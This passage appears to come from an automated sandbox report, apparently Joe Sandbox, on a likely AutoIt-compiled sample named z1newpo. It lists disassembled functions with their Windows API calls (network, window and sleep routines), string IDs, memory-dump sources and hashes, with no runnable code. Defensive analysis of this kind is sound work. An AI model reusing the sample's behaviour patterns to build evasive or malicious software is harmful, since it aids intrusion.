                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memmove$_sprintf_strlen
                                                    • String ID: %02X
                                                    • API String ID: 1921645428-436463671
                                                    • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                    • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                    • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                    • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                    Function 00451006 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: Combobox
                                                    • API String ID: 3850602802-2096851135
                                                    • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                    • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                    • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                    • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                    Function 00451321 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: LengthMessageSendTextWindow
                                                    • String ID: edit
                                                    • API String ID: 2978978980-2167791130
                                                    • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                    • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                    • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                    • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                    Function 00476CA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: GlobalMemorySleepStatus
                                                    • String ID: @
                                                    • API String ID: 2783356886-2766056989
                                                    • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                    • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                    • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                    • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                    Function 00465225 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: htonsinet_addr
                                                    • String ID: 255.255.255.255
                                                    • API String ID: 3832099526-2422070025
                                                    • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                    • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                    • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                    • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                    Function 0044256C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: InternetOpen
                                                    • String ID: <local>
                                                    • API String ID: 2038078732-4266983199
                                                    • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                    • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                    • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                    • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                    Function 004321A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock_memmove
                                                    • String ID: EA06
                                                    • API String ID: 1988441806-3962188686
                                                    • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                    • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                    • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                    • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                    Function 00442BB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: u,D
                                                    • API String ID: 4104443479-3858472334
                                                    • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                    • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                    • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                    • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                    Function 004560F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • wsprintfW.USER32 ref: 0045612A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend_mallocwsprintf
                                                    • String ID: %d/%02d/%02d
                                                    • API String ID: 1262938277-328681919
                                                    • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                    • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                    • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                    • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                    Function 00442651 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetCloseHandle.WININET(?), ref: 00442663
                                                    • InternetCloseHandle.WININET ref: 00442668
                                                      • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CloseHandleInternet$ObjectSingleWait
                                                    • String ID: aeB
                                                    • API String ID: 857135153-906807131
                                                    • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                    • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                    • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                    • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                    Function 00441BE8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                    • PostMessageW.USER32(00000000), ref: 00441C05
                                                      • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: FindMessagePostSleepWindow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 529655941-2988720461
                                                    • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                    • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                    • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                    • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                    Function 00441C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                      • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: FindMessagePostSleepWindow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 529655941-2988720461
                                                    • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                    • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                    • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                    • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                    Function 004370C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                      • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Message_doexit
                                                    • String ID: AutoIt$Error allocating memory.
                                                    • API String ID: 1993061046-4017498283
                                                    • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                    • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                    • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                    • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D